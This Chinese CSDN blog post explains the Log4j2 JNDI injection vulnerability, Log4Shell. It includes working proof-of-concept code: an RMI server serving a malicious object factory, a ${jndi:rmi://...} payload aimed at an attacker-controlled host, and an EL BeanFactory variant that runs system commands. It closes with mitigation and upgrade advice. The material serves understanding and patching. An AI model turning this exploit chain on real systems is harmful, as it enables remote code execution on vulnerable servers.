log4j2核弹级漏洞原理和分析

已于 2022-01-18 21:08:30 修改
阅读量2.1w 收藏 53
点赞数 12
分类专栏: 问题排查 文章标签: 安全 java log4j2
于 2021-12-11 20:41:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WX10301075WX/article/details/121878527
版权

log4j2漏洞原理和分析

起因

这两天被log4j2的漏洞给刷屏了,就像下面这样
在这里插入图片描述
但是很少有人提及这个漏洞到底是怎么回事儿。log4j2最为非常顶尖的日志框架,怎么会出现这种级别的漏洞呢?了解过漏洞的原理之后我发现,这应该算是一种低级漏洞了。原理就是JNDI代码注入。不过我也是先刷到了大都督的视频才了解了原因的Log4j高危漏洞!具体原因解析!全网第一!不得不说,大都督还是叼。

漏洞问题重现

依赖

首先,先码一下依赖,我这里是gradle工程,大都督的是maven工程,不过都一样。

//今天的主角,log4j2
implementation 'org.apache.logging.log4j:log4j-core:2.13.3'
implementation 'org.apache.logging.log4j:log4j-api:2.13.3'
//下面这俩不重要,主要是为了提高逼格的
implementation 'org.apache.tomcat.embed:tomcat-embed-core:8.5.11'
implementation 'org.glassfish:jakarta.el:3.0.3'

常规的日志写法

一般来说我们是这么写日志的。因为这个demo我仅仅只依赖了log4j2,所以代码就直接调用log4j2的api记录日志了。

public class Main {
    private static  final  Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        String content = "world";
        logger.trace("hello {}",content);
    }
}

上面这个应该是我们非常常用的一种日志记录手法了。输出的结果应该是hello world

lookups

不过log4j2并不满足上面的功能,他们提供了一种叫lookups的功能log4j2的lookups说明
这功能强大啊,我们用demo看一下:

public class Main {
    private static  final  Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        String content = "world";
        logger.trace("hello {}",content);

        //https://logging.apache.org/log4j/2.x/manual/lookups.html
        String content2 = "${java:os}";
        logger.trace("hello {}",content2);
        String content3 = "${java:vm}";
        logger.trace("hello {}",content3);
    }
}

我们看下输出的结果:

2021-12-11 20:03:29.751 [main] TRACE [13] - hello world
2021-12-11 20:03:29.755 [main] TRACE [17] - hello Windows 10 10.0, architecture: amd64-64
2021-12-11 20:03:29.756 [main] TRACE [19] - hello Java HotSpot(TM) 64-Bit Server VM (build 25.261-b12, mixed mode)

从结果上可以看到,输出的并不是hello ${java:os}hello ${java:vm},而是当前服务的操作系统信息和虚拟机信息。其实如果仅仅是这样,那也算不上什么漏洞,只能说功能强大而已。

Jndi Lookup

但是,log4j2还支持了Jndi Lookup这就很要命了。为了观察这个问题,我们先启动个JNDI的服务看看

public class SimpleJndiServer {
    public static void main(String[] args) {
        try {
            Registry registry = LocateRegistry.createRegistry(1099);
            System.out.println("create rmi 1099");
            Reference reference = new Reference("com.skyline.log4j2.demo.jndi.JndiObj", "com.skyline.log4j2.demo.jndi.JndiObj", null);
            ReferenceWrapper wrapper = new ReferenceWrapper(reference);
            registry.bind("demo", wrapper);
        } catch (RemoteException | NamingException | AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}
public class JndiObj implements ObjectFactory {

    static {
        System.out.println("this is JndiObj,i'm here!");
        try {
            //打开远程链接
            Runtime.getRuntime().exec("mstsc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    private String name;

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return new JndiObj();
    }

    @Override
    public String toString() {
        return "JndiObj{" +
                "name='" + name + '\'' +
                '}';
    }
}

然后,我们再写日志

public class Main {
    private static  final  Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        //JNDI注入参考链接
        //https://blog.csdn.net/caiqiiqi/article/details/105976072
        //192.168.31.13为客户端ip(攻击者ip),不是服务ip
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        String content4 = "${jndi:rmi://192.168.31.13:1099/demo}";
        logger.trace("hello {}",content4);
    }
}

可以看到这次我日志中的内容变成了${jndi:rmi://192.168.31.13:1099/demo},这里需要注意的是192.168.31.13是我的本机ip,也就是攻击者的ip。效果如下:
在这里插入图片描述
通过log4j2调用JNDI服务,我成功的打开了一个远程桌面。而且我写在JndiObj对象上的日志信息是输出在我的日志服务上的。也就是说,通过JNDI我(攻击者)成功的上传了自己的代码到用户服务中,这就很可怕了。
前面之所以打开的是远程桌面是因为在这里我是这么写的,但是,如果我写点别的呢?
在这里插入图片描述
很多时候我们记录在日志中的动态参数都是对象,这些对象可能是从前端或者别的服务请求过来的。比如一个登录接口,如果User对象中的userName的值就是我们上面写的${jndi:rmi://192.168.31.13:1099/demo},那后果真的是不堪设想…所以说是核弹级漏洞,也不算过分。

  • 附一个高逼格的JNDI代码注入写法:
    主要就是用到了

    implementation 'org.apache.tomcat.embed:tomcat-embed-core:8.5.11'
implementation 'org.glassfish:jakarta.el:3.0.3'

    代码如下:

    public class EvalJndiServer {
    public static void main(String[] args) {
        try {
            Registry registry = LocateRegistry.createRegistry(1098);
            //通过EL打开计算器
            ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", (String)null, "", "", true, "org.apache.naming.factory.BeanFactory", (String)null);
            resourceRef.add(new StringRefAddr("forceString", "a=eval"));
            resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);
            registry.bind("EvalObj", referenceWrapper);
        } catch (RemoteException | NamingException | AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}

漏洞补救

  1. log4j2.formatMsgNoLookups=true按照官方api解释说明,当这个值为true时,就不执行lookup了。
    在这里插入图片描述
    2.防火墙,禁止应用服务访问奇怪的ip

漏洞解决

升级到2.17.1

implementation "org.apache.logging.log4j:log4j-core:2.17.1"
implementation "org.apache.logging.log4j:log4j-api:2.17.1"
implementation "org.apache.logging.log4j:log4j-jul:2.17.1"
implementation "org.apache.logging.log4j:log4j-slf4j-impl:2.17.1"

感谢@古攵鄉白勺雲的提醒

skyline_wx
关注
  • 12
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
老生常谈Log4j和Log4j2的区别(推荐)
08-30
下面我们将从配置文件类型、核心JAR包、文件渲染和Log调用四个方面来比较Log4j和Log4j2的区别。 配置文件类型 Log4j通过一个.properties文件作为主配置文件,而Log4j2则弃用了这种方式,采用的是.xml、.json或者....
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 5029
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2漏洞复现以及解决方案
学习不止境的博客
08-10 4389
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
2024年最全分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新2024年冲刺年薪40w
最新发布
2401_84544363的博客
05-11 788
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 5178
​ Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
log4j2漏洞原理漏洞环境搭建复现
热门推荐
dreamthe的博客
03-03 1万+
背景 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。 log4j3远程代码执行漏洞主要由于存在JN
Log4j2漏洞详解(自学)
m0_64481831的博客
03-05 1447
Log4j2是Apache下的流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标,被应用于业务系统开发,用于记录程序输入输出日志信息。Log4j2是Apache的日志框架,用来记录和管理日志信息的。Log4j2漏洞原理是因为默认支持解析LDAP/RMI协议,且使用了占位符如{},并会解析里面的内容进行替换,所以攻击者就可以利用这一点构建特殊的恶意的占位符来进行攻击。
log4j2漏洞分析
cjdgg的博客
04-11 6735
log4j2漏洞分析环境布置前言 环境布置 和前面的JNDI注入时用的代码差不多 package Log4j2; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class); public stat
log4j2的使用及原理分析
qq_15458763的博客
05-07 3218
文章目录一、为什么要用log4j21、性能大幅提升2、自动重载配置(热加载)3、无垃圾机制二、如何从0接入log4j21、maven配置1.1 方法一(适合spring)方法二(适合springBoot)2、log4j2.xml配置2.1 log4j2.xml 示例2.2 log4j2.xml 主要模块功能说明2.2.1 Configuration(日志配置管理容器)2.2.2 Loggers 日志记录器2.2.3 Appender(输出终端)主要子元素及参数介绍:三、log4j2 原理(源码实现)1、启动
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Log4j 基本原理
02-22
虽然 Log4j 这种技术已经出来很久了,也有很多人在用,但自己以前都是写一些很小的程序,所以根本就没感觉到这种技术对我有什么用。就像 JUnit 一样,虽然很多人都在用,但我没有遇到什么问题需要用这个东西来解决,也就不觉得它有什么用了。但前段时间第一次用 struts 2 整合 hibernate 写一个小小的书店租赁管理系统时出了好些问题,输出语句添了又删,删了又添,搞得有点小郁闷,于是花了半个晚上学下 Log4j ,掌握了一点它的基本原理
Log4j详解,详细讲解log4j的使用,和原理
12-08
Log4j详解,详细讲解log4j的使用,和原理
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
log4j2原理分析漏洞复现
HUANGXIN9898的博客
10-23 840
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
Log4j2 远程代码执行漏洞(cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6113
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
Activiti7踩坑记录(二),依赖冲突NoSuchMethodError: javax.el.ELUtil.getExpressionFactory
qq_41046428的博客
06-11 4076
项目场景: 运行环境: SpringBoot - 2.3.1 Activiti - 7.1.0M4 问题描述: 引进依赖后,尝试测试一下业务流程,结果第一行debug还没开始,就已经出现错误了 测试代码: @Autowired private RepositoryService repositoryService; @Test public void initDeploymentBPMN(){ //bpmn文件所在的文件路径 String filen
Log4j2 漏洞与解决方案】
m0_46459413的博客
12-29 489
这本是个不常用的插件,但代码触发到的频率很高,高到你代码中每次触发info,warn,error 等日志写入的时候,都会去校验一下是否执行Lookup的逻辑。如果用你的主机,远程调用我启动的破坏代码(应用服务)呢,这时候你的服务主机就是案板上的肉了,任人宰割。Log4j2 bug的破坏方式是什么,其实很简单,就是类似于SQL注入,这个更厉害,直接是代码注入,代码执行权限自然相当于应用权限。有的项目,可能依赖较为复杂,且不方便重新编译,可以直接在运行时,添加以下JVM参数,这样可以禁止Lookup生效。
log4j2漏洞原理
07-28
log4j2漏洞是指Apache Log4j2框架中存在的一个安全漏洞,该漏洞被称为"Log4Shell"或"CVE-2021-44228"。该漏洞原理是由于log4j2框架在处理日志消息时,会自动解析并执行包含特定JNDI注入代码的日志消息。这意味着攻击者可以通过构造恶意的日志消息,利用JNDI注入来执行任意的远程命令。具体来说,攻击者可以在日志消息中使用JNDI注入表达式,通过远程JNDI服务器加载恶意的类或执行任意的命令。 这个漏洞的危害非常严重,攻击者可以通过发送恶意的日志消息来远程执行任意代码,可能导致服务器被完全控制,数据泄露,或者其他恶意行为。该漏洞已经被广泛利用,并且已经影响了许多应用程序和系统。 需要注意的是,log4j2漏洞只存在于使用了受影响版本的log4j2框架的应用程序中。为了解决这个漏洞,建议开发人员升log4j2安全版本,并采取其他安全措施,如配置安全策略、限制日志消息的内容等,以减少潜在的风险。 #### 引用[.reference_title] - *1* *3* [log4j2漏洞原理漏洞环境搭建复现](https://blog.csdn.net/dreamthe/article/details/123230283)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [一文读懂面试官都在问的Log4J2漏洞](https://blog.csdn.net/YangYubo091699/article/details/130087573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值